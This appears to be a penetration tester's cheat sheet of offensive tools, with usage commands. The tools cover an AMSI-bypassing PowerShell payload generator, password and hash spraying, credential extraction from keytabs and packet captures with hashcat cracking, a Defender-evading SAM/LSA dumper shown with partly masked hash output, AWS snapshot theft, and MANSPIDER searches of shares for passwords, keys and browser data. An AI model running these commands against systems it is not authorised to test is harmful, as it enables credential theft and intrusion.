Tools

Tools

AD Mindmap

Repo Link

Powershell Payload Gen

πŸ›  Powershell Payload Generator Tool

  • Always Generate unique Random words in payload.
  • AMSI Bypass.
  • Fast & Efficient

Repo link:- link

Usage:-

1
./Slot.sh --lhost 192.168.x.x --lport 9001 --sport 8000

🌐 IOXIDResolver

  • Resolve all IP Address of the Machine.(Ipv4 and IPv6 Both)
  • Resolve all interface Adress.
  • Also Resolve the hostname

Repo link:- link

Usage:-

1
python3 IOXIDResolver.py -t  192.168.xx.xx

πŸ₯… NetSpray

  • Spray Passwords and Hash in all Protocals.

Repo link:- link

Usage:-

1
NetSpray <protocols|all> <targets> -u <username> [-p <password> | -H <hash>]

🌐 username-anarchy && 🌐 GenUser_list.sh

  • Generating variation of usernames.

Repo link:- username-anarchy

Usage:-

1
./username-anarchy -i users.txt  > valid-user.lst 

Repo link:- GenUser_list

Usage:-

1
2
3
4
5
./GenUser_list.sh -h 
*****************************************
*           GenUser_list.sh             *
*****************************************
Usage: ./GenUser_list.sh -i input_user.lst

🌐 KeyTabExtract

  • Extract creds from keytab file.
  • For Example Below

Repo link:- KeyTabExtract

Usage:-

1
python3 KeyTabExtract.py /path/to/krb5.keytab
1
2
3
4
5
6
7
8
9
10
└─# python3 KeyTabExtract.py /home/0xmr/krb5.keytab 
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : AI.LOC
        SERVICE PRINCIPAL : UUCP$/
        NTLM HASH : fa1a60293357xxxxxe99b306e406537
        AES-256 HASH : 6de7510ba5a852dc1dea141a8bda6xxxxxx25db6d04a133713feaddbbc19f6ba8
        AES-128 HASH : 5dde7468f96xxxxxfb326cb09ac28ee0

🌐 trufflehog

  • Find .git File leaks.

Repo link:- trufflehog

Usage:-

1
trufflehog file://$(pwd)   #It scan the current Directory for Git leaks....

🌐 PCredz

  • PCredz is a tool written in python that can extract clear-text credentials such as credit card numbers, POP, SMTP, FTP, Kerberos AS-REQ hashes from a network packet capture or a live interface.

Repo link:- PCredz

Usage:-

1
2
3
4
5
6
7
8
# Extract Secrets
./pcredz -f file.pcap
hashcat -m 5600 NTLMv2.txt /usr/share/wordlist/rockyou.txt

# Focus on cleartext credentials only
./Pcredz -f capture.pcap --disable NTLM --disable Kerberos

./pcredz -i eth0 -v      # Capture live Interface

🚈 silph.exe

  • This tool will able to bypass and Dump all secrets like Sam hashes,lsa and dcc2 Hashes.
  • Non Detectable by Defender.

Repo link:- sliph.exe

Usage:-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
PS C:\Users\Administrator\Desktop> ./silph.exe -dcc2 -lsa -sam

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—     β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘
β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
β•šβ•β•β•β•β•β•β•β•šβ•β•β•šβ•β•β•β•β•β•β•β•šβ•β•     β•šβ•β•  β•šβ•β•
    Stealthy In-Memory Password Harvester

  "Well… I think I wanted to be like Eris."
[*] Dumping local SAM hashes
Name: Administrator
RID: 500
NT: 2dfe3378335xxxxxx764e581b856a662a

Name: DefaultAccount
RID: 503
NT: <empty>

Name: WDAGUtilityAccount
RID: 504
NT: 58f8e0214xxxxxxbc2c5f82fb7cb47ca1
Name: tyler
RID: 1008
NT: 1fceba8xxxxxxxxx15fb40e29c86b01f6

Name: sshd
RID: 1009
NT: f450335b6xxxxxxxxx1d44aa53bafb591

[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
dpapi_machinekey: 0x0e88ce11d311dxxxxx22ac2708a4d707e00be
dpapi_userkey: 0x8b68be9ef724xxxxxxxxx3559e10078e36e8ab32
[*] NL$KM
NL$KM: 0x8dd28e6754cxxxxxxx953b95b46a2b366

πŸ’ Ip2cloud & ip2provider

  • Both tool help us to find the vendor Ip, where it’s is hosted like aws,gcp,azure or etc…

Rep0 link:-ip2cloud Github

Usage:-

1
echo $IP | ip2cloud

Repo link:-ip2provider Github

Usage:-

1
./ip2provider.py $IP

⛷️ cloudfox

  • CloudFox helps you gain situational awareness in unfamiliar cloud environments.
  • It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.

Repo link:-Cloudfox Github

Usage:-

1
2
3
4
5
# Create a profile
aws configure --profile <Profile Name>

# Got some pentesting stuff
cloudfox aws --profile <Profile Name> all-checks

πŸ’€ dsnap

  • Gold Mine tool to find the snapshot and Download it (EBS=They are like virtual Machine Hardisk.)

Repo link:-dsnap

Usage:-

1
2
3
4
5
6
7
8
# Configure Profile
aws configure --profile <ProfileName>

# list snapshot id's
dsnap --profile <profileName> --region <awsRegion> list

# Download snapshots
dsnap --profile <profileName> --region <awsRegion> get <snapshot id>

⛷️Snyk && OpenGrep

  • Gold Mine Tool for Source Code Review. Find Open Vulnerbility in Open Source Codes.

image

Snyk Usage:-

1
2
3
4
5
# Scan Current Directory Files
snyk code test .

# Normal Scan
snyk test

OpenGrep Usage:-

1
2
3
4
5
6
7
8
9
10
11
# Auto Scan
opengrep scan --config auto .

# Scan OWASP TOP 10
opengrep scan --config p/owasp-top-ten .

# Scan Python files for vulnerblities
opengrep scan --config p/python file.py

# Scan javascript files for vuln
opengrep scan --config p/javascript file.js

MANSPIDER

  • MANSPIDER is a tool that allows us to crawl through network shares to find clear text credentials. It uses regex filters to identify passwords saved within filetypes such as docx, xlsx, xml etc.

Usage:-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# Searching for filenames with creds
manspider $IP -f passw pass password passwd pwd cred creds credential credentials secret secrets key keys token tokens auth authentication login logon user username admin administrator account accounts api apikey api_key access accesskey db database db_pass db_password db_user db_username connection connectionstring conn connstr network config configuration -d $DOMAIN -u $USER -p $PASSWD

# Searching for spreadsheets with *password* in the filename
manspider $IP -f passw pass password passwd pwd cred creds secret secrets token tokens auth login logon key keys -e xlsx csv ods tsv xlsm xls -d $DOMAIN -u $USER -p $PASSWD

# Searching for documents containing passwords
manspider $IP -c passw password passwd pwd credentials creds secret token apikey api_key connectionstring conn_str -e xlsx csv docx pdf txt xml json yaml yml ini conf cfg properties env log md rtf odt -d $DOMAIN -u $USER -p $PASSWD

# Searching for SSH keys
manspider $IP -e ppk rsa pem ssh pub asc gpg pgp -o -f id_rsa id_dsa id_ecdsa id_ed25519 id_xmss known_hosts authorized_keys -d $DOMAIN -u $USER -p $PASSWD
manspider $IP -e '' -c 'BEGIN .{1,10} PRIVATE KEY' -d $DOMAIN -u $USER -p $PASSWD

# Searching for password manager files
manspider $IP -e kdbx kdb 1pif agilekeychain opvault lpd dashlane psafe3 enpass bwdb msecure stickypass pwm rdb safe zps pmvault mywallet jpass pwmdb kwallet keeweb pass -d $DOMAIN -u $USER -p $PASSWD

# Searching for certificates & crypto material
manspider $IP -e pfx pk12 pkcs12 pkcs8 pem key crt cer csr jks keystore keys der p12 p7b p7c p8 spc pvk snk aes -d $DOMAIN -u $USER -p $PASSWD

# Searching for config & environment files (high value targets)
manspider $IP -e conf cfg ini env properties yaml yml toml xml json -c passw password passwd secret token apikey connection -d $DOMAIN -u $USER -p $PASSWD

# Searching for backup & sensitive archive files
manspider $IP -f backup bak old dump shadow ntds sam system security -e zip tar gz 7z rar bak bkp old sql dump -d $DOMAIN -u $USER -p $PASSWD

# Searching for browser stored credentials
manspider $IP -f logins cookies places history -e sqlite db json -d $DOMAIN -u $USER -p $PASSWD

# Searching for VPN / RDP / Network config files
manspider $IP -e ovpn rdp pcf vpn -f vpn rdp remote gateway -d $DOMAIN -u $USER -p $PASSWD

# Searching for scripts that may contain hardcoded creds
manspider $IP -e ps1 psm1 bat cmd sh bash zsh py rb pl vbs js ts -c passw password passwd secret token apikey credential -d $DOMAIN -u $USER -p $PASSWD